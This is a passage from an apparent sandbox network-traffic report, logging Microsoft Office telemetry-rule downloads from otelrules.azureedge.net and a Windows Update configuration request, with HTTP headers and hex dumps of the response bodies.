                                                                                                                                                                      2024-11-21 05:24:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      116192.168.2.64985813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:04 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:05 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                      x-ms-request-id: 5a6b30d1-101e-00a2-7c5b-3b9f2e000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052405Z-178bfbc474bwlrhlhC1NYCy3kg0000000140000000000tzx
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      117192.168.2.64985913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:04 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:05 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:05 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                      x-ms-request-id: 4b825c62-901e-008f-3f5c-3b67a6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052405Z-178bfbc474bh5zbqhC1NYCkdug00000000w000000000nfgz
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:05 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      118192.168.2.64987513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:06 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:06 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1427
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                                                      x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052406Z-r1d97b995778dpcthC1TEB4b5400000009qg00000000m0zg
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:07 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      119192.168.2.64987413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:06 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:07 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                      x-ms-request-id: 38659630-901e-008f-15a0-3b67a6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052407Z-r1d97b995774n5h6hC1TEBvf8400000009wg000000008ghp
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:07 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      120192.168.2.64987613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:06 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:07 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1390
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                                                      x-ms-request-id: 44ceed99-901e-0064-727b-3be8a6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052407Z-178bfbc474bvjk8shC1NYC83ns00000000z0000000000dt8
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:07 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      121192.168.2.64987813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:07 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:07 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                      x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052407Z-1777c6cb7542p5p4hC1TEBq0980000000amg00000000chut
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:07 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      122192.168.2.64987913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:07 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:07 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                      x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052407Z-178bfbc474btrnf9hC1NYCb80g000000013g00000000n0h1
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:07 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      123192.168.2.64988452.149.20.212443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b2+uAFVzyd7zfyp&MD=xvAfNsrA HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                      2024-11-21 05:24:09 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Expires: -1
                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                      MS-CorrelationId: 2f0bfb2d-f4ad-4fc4-b15d-3990254403d4
                                                                                                                                                                      MS-RequestId: d7b9e035-cc99-465b-9061-5b6da3b8be70
                                                                                                                                                                      MS-CV: pZFnpSn28Eme2hqu.0
                                                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:08 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 30005
                                                                                                                                                                      2024-11-21 05:24:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                      2024-11-21 05:24:09 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      124192.168.2.64989013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:09 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:09 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1391
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                      x-ms-request-id: 44a56bea-901e-0064-626a-3be8a6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052409Z-178bfbc474bw8bwphC1NYC38b400000000u000000000ftq3
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
